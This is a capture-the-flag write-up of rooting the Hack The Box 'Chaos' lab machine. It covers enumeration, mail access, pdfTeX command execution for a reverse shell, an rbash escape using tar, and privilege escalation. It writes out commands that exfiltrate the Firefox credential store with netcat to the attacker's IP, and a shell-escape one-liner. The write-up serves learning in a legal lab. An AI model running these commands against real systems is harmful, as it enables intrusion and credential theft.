Hack The Box

Hack the Box - Chaos

pwned: 20/02/2019

Today i pwned the Chaos box on Hack The Box - It was my first one, and I probably made a mistake as this one is a little crazy.

I will go through my enumeration process at each stage, output of good checkpoint commands and the method I used to root the machine.

You can view full size images by clicking the text below the image

Initial Enumeration.

Very similar to most machines - a detailed nmap scan to see services using the following command:

1
nmap -sV -sC -p 1-65535 -A -v 10.10.10.120

This produced the following output:
Nmap scan for 10.10.10.120

We see a few interesting ports here that can tell us information:

  • 80: There is a web server, and we can try accessing it in a browser.
  • 110: A pop3 mailserver running Dovecot
  • 143: An imap mailserver running Dovecot
  • 993: A ssl connection to the imap mailserver
  • 995: A ssl connection to the pop3 mailserver
  • 1000: Webmin server, can also be accessed via the browser.

First things first, let’s try accessing it from the browser.

What we see when entering the web server for the first time

Okay, so we can’t access this website via the ip address. So how else do we access websites?
By using a qualified name. How do we bind an ip address to a qualified domain name?
I edited the /etc/hosts file to point 10.10.10.120 to chaos.htb, and this is what I saw:

Expand Image

So far so good, but after poking around this website and the source, I couldn’t really find anything interesting. Time to fire up dirb using:

1
dirb http://10.10.10.120/ /usr/share/wordlists/dirb/common.txt

Expand Image

The WordPress Rabbit Hole

After running dirb, I found that the website contained a wordpress site. I fired up wpscan to find directories, and enumerate possible usernames and passwords

Expand Image

The dirb revealed a wordpress site, with a single author - Human

This brought me to a wordpress site with a password protected post. I ignored this for now, and tried for atleast 2 hours to try and brute force or break my way into the WordPress admin control panel, as I usually do, as I was positive this was the answer. This is why I called this the rabbit hole, as it was ultimately a dead end.

I then turned my attention to the password protected post. After looking at the forum thread on HTB, one user said that zero brute force was required. This means that the password was something logical
Heres what I tried

  • Viewed source for hints - No results
  • Viewed BurpSuite repeater output for hints - No results
    I noticed one thing missing that I usually see on WP posts - The author. As a hail mary I entered the author’s name as the password:
Expand Image

I now had the credentials for webmail - I immediately assumed this meant the pop3/imap webmail servers, so I had to study on how to talk with these servers. Turns out you can just telnet into these servers, and use some Dovecot formatted commands to login as a user.

I tried to login as ayush to the dovecot pop3 server using telnet, however it told me that Authentication would not be allowed using plaintext. I thought for a moment, and realized it was obvious - I was using telnet, which transmits in plain text.

I then did some more research on SSL clients that can connect to a port, and came across s_client from openssl. I used s_client to connect to the ssl port of pop3 this time (995) using:

1
openssl s_client -connect 10.10.10.120:995

Expand Image

I finally logged in with some Dovecot commands, but it took me quite a while to get the hang out of the commands:

Expand Image

Eventually - I stumbled across an email in the Drafts folder and fetched it from the s_client session using:

1
a fetch 1 body[text]

Expand Image

So this email had 2 attachments - A text file named enim_msg.txt, which was encoded in base64 thanks to the Content-Transfer-Encoding: base64 header, and a python file called en.py

I decoded the enim_msg.txt from b64, and it ended up being encrypted. Which was expected as the email said it was encrypted.

I then decoded the en.py file and opened it in my IDE:

Expand Image

This seemed to be just an encryption function. I assumed that I needed to develop the decrypt function. While I do know programming in python, i only have very little experience in the PyCrypto library (which was what was being used here), especially padding byte strings for use in Cipher Block Chain (cbc) mode. So I did some research:

Expand Image Expand Image

After a decent chunk of time, I decided to google a snippet of the encryption function in case it was used elsewhere. Lo and behold, the exact same encryption function was a popular github repo, and it included the exact decryption function that I also needed. I also hate to mention that I was stuck after this step anyway because I included the text that starts with –= into my to-be-decrypted file, which I realized was just a signature/EOF delimeter. Rip 30 mins to that.

Expand Image

Now, reading back the email, Ayush said “YOU are the password”. I figured out pretty quickly that the password was probably ‘sahay’ then. I then used that as the key to decode the msg file:

Expand Image

As expected, this message was b64 encoded again. A quick decode using:

1
base64 -d decrypted_msg_d > decrypted_msg_final

Led to this result:

Expand Image

So, now we have a new link in that website that could not possibly be dirbusted. After navigating it and inspecting it in BurpSuite, we can see that it is an app called pdfTeX, which is a php app that can convert LaTeX to PDF.

Expand Image

This led me to googling exploits or vulnerabilities, and it turns out, Pdftex actually executes commands in the host environment in order to convert the file, and direct commands can be written with the \immediate\write18{} tex line. As we can see from the output above, write18 was enabled - This was a clear vector for a reverse shell.

There were a few things I tried - First, I tried entering a direct nc shell to myself:

Expand Image

This didn’t work, as I assume that the host did not have nc installed.

Next, I tried to run a php reverse shell that I got from a reverse shell cheat sheet. I also had to encode the entire command using a URL encoding service online, and this worked, but closed the connection straight after:

Expand Image

I tried running this a few more times, but nothing worked. Eventually, I tried the python reverse shell one liner out. I encoded this too
Expand Image

And finally, after some trial and error, I had a reverse shell for the www-data user:

Expand Image

PrivEsc

Now I feel like that the machine has moved away from CTF like challenges, and was now doing some priviledge escalation.
I managed to get a user shell quite quickly, as my first step of enumeration for a low-priv shell is to read /etc/passwd.
This revealed a list of users (and hopefully a password). Ayush was on that list, who was a user I already had a password for if he was lazy.
So I tried logging in as him with the same credentials, and it worked:

Expand Image

But there was a problem, I was in a restricted bash (rbash) shell, and the only command available to me seemingly was cd.
I then studied a completely new topic of escaping a restricted shell, and found this incredible document from Exploit DB that listed a few techniques:
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

This had all the information I needed, so I tried one by one each command to see if I had access to it, and noticed that I could use the tar command. So, I followed that pdf and typed in:

1
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/sh

Expand Image

I couldn’t believe it actually worked, I now had a non restricted shell. But for whatever reason, I still could not use commands like ls. I tried to run them directly from their directories using the following workaround

1
$ /bin/ls -la

Which worked. So then I navigated to my home directory, and found the user flag.

Expand Image

Next, I had a look around the users home directory showing all files using the above command again:

Expand Image

I had to get some help here with some hints, as the hints suggested that the root flag is within the same directory as the user flag. So I knew it had to be in here somewhere. I found a .mozilla folder, and wondered if there was possibly some saved logins stored, as I knew that Mozilla stored passwords in an sqlite database.

Sure enough, I found a mozilla profile, and the logins.json and key4.db file that I needed:

Expand Image

I had to google on how to restore Mozilla profiles and carry them across computers, as I had no experience doing so. In my research, I found out that you only need the logins.json and key4.db file, and then just copy them to another profile or your profile and thats all you need to do.

I tried to cat each file, and then copy and paste it’s contents into a file using echo, but that didn’t work.
I then did some more research on how I can transfer files via a reverse shell, and found a way using netcat, you setup a listener on attacker to pipe to a file, and setup a connection on the host that reads the file. I used the following commands:

Client:

1
nc -l -p 5556 > logins.json

Host:

1
/bin/nc -w 3 10.10.12.163 5556 < logins.json

And then the same for the key4db file. This worked:

Expand Image

I then transferred across those 2 files, overwriting my current firefox (it was just the burpsuite firefox so there was nothing saved) profiles, and checked my saved logins.

Sure enough:

Expand Image

The details were there in plain text. I then went back to my www-data reverse shell, tried to sign in as root, but I couldn’t sign in without an interactive TTY. So i googled Shell upgrades, and found a python one liner:

1
python -c 'import pty; pty.spawn("/bin/sh")'

This worked great, then I just logged in to root as normal with su, put in my new password, and found the flag

Expand Image

Conclusion

All in all, an absolutely crazy box for my skill level (which is near 0 at the moment), but I learned an astronomical amount regarding new enumeration techniques, escaping restricted shells, enumeration for priv esc as well as learning how to avoid traps.